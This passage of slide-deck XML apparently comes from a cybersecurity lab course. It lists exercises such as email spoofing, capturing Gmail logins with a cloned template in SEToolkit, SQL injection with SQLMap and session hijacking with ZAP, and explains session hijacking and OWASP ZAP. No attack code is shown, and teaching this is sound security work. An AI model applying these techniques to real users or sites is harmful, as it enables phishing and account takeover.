              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud</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15.  Perform SQL injection attack using SQL Map in kaliLinux.</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16. Perform session hijacking using Zed Attack Proxy (ZAP).</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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215"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25905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16</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1492" name="Google Shape;1492;p215"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="769500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Perform session hijacking using Zed Attack Proxy (ZAP).</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="86148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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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216"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391178" y="555108"/>
            <a:ext cx="4612200" cy="417300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPct val="116666"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What is session hijacking ?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1498" name="Google Shape;1498;p216"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1499" name="Google Shape;1499;p216"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145325" y="1322924"/>
            <a:ext cx="8718300" cy="3568200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Rockwell"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>A session hijacking attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>happens when an attacker takes over your internet session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t> — for instance, while you're checking your credit card balance, paying your bills, or shopping at an online store. Session hijackers usually target browser or web application sessions.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Rockwell"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>Session hijacking is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>an attack where a user session is taken over by an attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>. ... To perform session hijacking, an attacker needs to know the victim's session ID (session key). This can be obtained by stealing the session cookie or persuading the user to click a malicious link containing a prepared session ID.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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217"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="190150"/>
            <a:ext cx="6623100" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How Session Hijacking Happens</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1505" name="Google Shape;1505;p217"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1506" name="Google Shape;1506;p217" descr="C:\Users\Dell\Downloads\illustration-of-session-hijacking-using-xss.png"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2337134" y="1234678"/>
            <a:ext cx="4611000" cy="362010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1" name="Google Shape;1511;p218"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282895" y="140018"/>
            <a:ext cx="5402100" cy="924600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What is ZAP(zed attack proxy) ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:b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1512" name="Google Shape;1512;p218"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1513" name="Google Shape;1513;p218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="778192"/>
            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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514" name="Google Shape;1514;p218"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559468" y="1109913"/>
            <a:ext cx="8139300" cy="4044600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Rockwell"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>OWASP ZAP (SHORT FOR ZED ATTACK PROXY) IS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>AN OPEN-SOURCE WEB APPLICATION SECURITY SCANNER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>. ... WHEN USED AS A PROXY SERVER IT ALLOWS THE USER TO MANIPULATE ALL OF THE TRAFFIC THAT PASSES THROUGH IT, INCLUDING TRAFFIC USING HTTPS. IT CAN ALSO RUN IN A DAEMON MODE WHICH IS THEN CONTROLLED VIA A REST API.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Rockwell"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell"/>
                <a:ea typeface="Rockwell"/>
                <a:cs typeface="Rockwell"/>
                <a:sym typeface="Rockwell"/>
              </a:rPr>
              <a:t>THE ZED ATTACK PROXY (ZAP) IS AN EASY TO USE INTEGRATED PENETRATION TESTING TOOL FOR FINDING VULNERABILITIES IN WEB APPLICATIONS. IT IS DESIGNED TO BE USED BY PEOPLE WITH A WIDE RANGE OF SECURITY EXPERIENCE AND AS SUCH IS IDEAL FOR DEVELOPERS AND FUNCTIONAL TESTERS WHO ARE NEW TO PENETRATION TESTING.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell"/>
              <a:ea typeface="Rockwell"/>
              <a:cs typeface="Rockwell"/>
              <a:sym typeface="Rockwell"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow"/>
              <a:ea typeface="Arial Narrow"/>
              <a:cs typeface="Arial Narrow"/>
              <a:sym typeface="Arial Narrow"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1519" name="Google Shape;1519;p219"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1520" name="Google Shape;1520;p219"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282894" y="778192"/>
            <a:ext cx="8718300" cy="4007100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="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Free , open source.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Cross platform.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Easy to use.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Easy to install.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Internationalized.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Fully documented.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Involvement actively encouraged.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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Reuse well regarded components.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1521" name="Google Shape;1521;p219"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
